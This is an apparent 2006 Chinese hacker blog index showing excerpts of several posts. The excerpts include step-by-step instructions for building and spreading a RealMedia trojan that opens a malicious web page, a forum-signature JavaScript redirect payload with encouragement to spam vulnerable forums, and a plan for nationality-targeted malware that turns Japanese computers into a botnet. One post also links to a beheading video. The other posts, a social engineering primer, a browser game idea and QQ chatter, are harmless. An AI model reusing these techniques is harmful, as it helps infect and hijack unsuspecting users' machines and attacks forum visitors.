博文
深入浅出社会工程学(2006-04-16 20:27:00)
摘要:基础知识
在讲正题前先了解一下基本的知识吧:一些恶意入侵系统并进行摧毁的人叫cracker, 而一些只会使用别人开发的工具去入侵的叫做script kiddies. 我想这些都是大家知道的吧。 真正的黑客是具有编程能力并可以自己开发工具并有共享精神的人。一个真正的黑客不但是技术上的能人,同时,也应该是心理战术和与人交流的高手。对于怎么才能成为一个真正黑客的文章大家应该看的不少了吧,这里就不废话介绍。
在这篇文章里,我并不要告诉大家怎么去用所谓的技术―包括编程或者其他网络技术去对系统进行物理入侵。我要讲的是在一种更高的技巧,就是所谓的社会工程学(Social Engineering)。 可能大家对社会工程学这个名次并不算太了解,现在我就要通过这篇文章让大家理解社会工程学是如何应用在系统入侵和应该怎么进行基本的防范。
什么是社会工程学 Social Engineering is an academic field of study to construct a theory to resolve various social problems by means of physical, social and institutional approach with special emphasis on step by step or piecemeal improvements based upon the two directional planning and designing experiences of the reality.
哈哈,看不懂了吧,这是社会工程学的基本意思,上面那段话的大意是: 社会工程学是关于建立理论通过自然的,社会的和制度上的途径并特别强调根据现实的双向计划和设计经验来一步接一步的解决各种社会问题。 是不是很难明白啊。我也觉得。不用理这个,让我们看看社会工程学在我们的领域怎么解释:
社会工程学是一种攻击行为, 攻击者利用人际关系的互动性所发出的攻击:通常攻击者如果没有办法通过物理入侵的办法直接取得所需要的资料时,就会通过电子邮件或者电话对所需要的资料进行骗取,再利用这些资料获取主机的权限以达到其本身的目的。
现在理解了吗??? 如果还是不能理解我们就列举1个最最简单的例子说明一下好了:
盗取qq大家知道吧,除了本......
[创亿无限]rm木马制作 有演示(2006-04-16 12:24:00)
摘要:1 做RM木马主要是利用RM影音文件来连接网页的马, 所以做RM木马前我们先做好网页木马.2 将网页木马上传到空间3 打开Helix Producer Plus 9 下面的 rmedtgui.exe做RM木马,4 写一个文本文件起名叫 1.txtu 00:10.0 01:10.0 http://xxxxxxxxx(你的马的网页地址)u 01:10.0 01:10.0 http://xxxxxxxx这里表示的是文件播放10秒和1分10秒的时候自动打开http://xxxxxxxxx5file菜单Open打开一个Rm文件,从菜单栏的tools中选择Merge Events,在弹出的对话框中选择1.txt文件,确定后Rmedtgui开始合并,保存6 然后就可以传给别人,或者做个bt种子什么的发布出去就好了
我给你们一个示范看看
如果你没开拦截程序,那么会弹个网页出来,这个网页是我做的把关页面,每次转向不同人的qq空间
......
[创亿无限]利用论坛漏洞帮你刷qq空间人气(2006-04-15 17:15:00)
摘要:
某些论坛系统的签名有漏洞
利用象
[img]javascript:window.navigate('http://xxxx/xx');[/img]
这样的代码可以让访问你文章的人直接跳转到你指定的页面
只要你把那个地址改成你的qq空间地址
呵呵,就达成了刷qq空间的目的
下面你知道该怎么做了吧?那就是赶紧找有漏洞的论坛去狂发帖
呵呵
顺便告诉你:编程爱好者论坛也有这个漏洞
不信大家搜索一个用户名为hei 的人发的帖子(我的测试号)
......
日本人质斩首视频 [转](2006-04-06 22:01:00)
摘要:太恐怖了
不敢放在这里给大家看,我把地址发给大家
http://www.blogcn.com/u/52/43/democracychina/index.html
进去看第一个文章......
[创亿无限]网页在线游戏设想(2006-04-05 14:06:00)
摘要: 经常在网吧里不能下游戏或者下了游戏不能玩,这种情况也出现在你用受限制的帐号登陆系统不能装游戏的情况,那么该如何解决呢
或者你想让完家对你的游戏有个迅速的体验,也许你会想发布demo,但看了前面所说的那种情况,你认为demo能解决问题么?显然不完全能
一开始我想可以用flash做,但是看了flash的载入速度我想还是算拉,等得久了完家就会对你的游戏丧失信心
后来想起了以前玩的那个星际争霸网页版,终于想起了可爱的javascript语言,原来竟然能作出这种效果,真是惊人,不过更惊人的还在后头,星际争霸online版也出来了,这个大家可以去baidu搜索关键词"星际争霸online"或者去我给的演示站:
http://jsvb.116.tofor.com/xingji
支持多人在线,跟网络游戏差不多,这下我算是服了,确实很牛
那么先前的问题有答案了,你可以用js来发布你的demo
不过话又说回来了,js有个缺点就是开源,怎么保护源代码是个问题,但我想大可不必在这里耗费时间,既然保不住干脆不保护,不做出售型的单机游戏,做那种休闲型的单机游戏或者做那种网络游戏,这个不在乎代码是否被看,因为卖的是服务
那么具体应该做哪些呢?我给我的意见:
1,休闲网络游戏,抢大话类游戏的生意
2,棋牌对战游戏,就是那种开房间进去玩的,抢qq的生意,试想qq游戏平台的游戏还要下载安装才能玩,这个就是他的弱点,可以攻他 (关于这个我另外有详细的构思,如果有谁愿意搞的话,我可以给你点帮助)
3,虚拟城市社区什么的,象传统bbs那样的版面你一定厌倦了,何不换种体验?风景区也可以出钱请人做个demo版的风景区在线浏览,借此推广自己(为什么我会想到风景区呢?呵呵,透露下,我是黄山人)图书馆也可以做个在线书库什么的,当然那需要帐户密码才能看书了(这个我也有过考虑,愿意做的我也可以帮助)......
郁闷ing,不能加人了(2006-04-01 20:49:00)
摘要:不能加人了
连qq群加qq好友达到了500了
以前看到最大上限是500感觉离自己很遥远
现在才知道原来这么近
诶,看来我的小号要难逃一劫拉!!......
[创亿无限]类基因武器的电脑病毒设想(2006-04-01 20:39:00)
摘要:写病毒黑到自己人是不是广大爱国黑客很郁闷的一件事呢
我也是这么想
所以我有个想法,做一种类似于基因武器的电脑病毒(当然不是本人做拉,本人一再声明自己不是写代码的料),对被感染的电脑进行简单检测,防止伤到自己人
这个病毒的实现功能应该有:
1,能检测出自己人还是敌人
2.对自己人加以保护,干些修补漏洞,充当防火墙的事,对敌人则大肆破坏,把他变成僵尸网络什么的
实现方式(设想):
1:检测windows(此处用windows替代操作系统)地区属性,看windows使用者是哪个国家的,似乎windows有这个功能,
2,检测电脑的区时,比如中国和日本的时区就不同,检测到日本的时区那就,呵呵
3,检测ip,不同的国家不同地区ip段是不同的,这个也可以作为依据
4,捆绑战略:跟其他各种形式的病毒木马什么的结盟,只要它们一攻入电脑就立马下载本病毒,再由本病毒检测被感染者,检测还可以叫电脑去指定的地方下载检测程序分析电脑使用者的上网习惯,语言习惯等,综合检测效果才是最好的
至于说下载服务器,我以为应该注意三点
1,使用免费服务空间
2,在全世界申请多个免费空间
3,对全世界的ip划分区域,每个区域对应着一个就近的空间下载
好了
就写这么多吧
提示:本文 版权没有,盗版不究,转载必谢!
......
[庆祝]我的群又上100了(2006-03-31 18:05:00)
摘要:呵呵,去年清理掉大部分的群,现在又涨起来了
真是郁闷,不过哪个群我都不愿意退,毕竟通过群我认识了不少人也学到了不少东西
至于我的好友,虽然很多但只有几个经常聊的
另外放个好玩的页面
http://xinghebaye.it50.net
......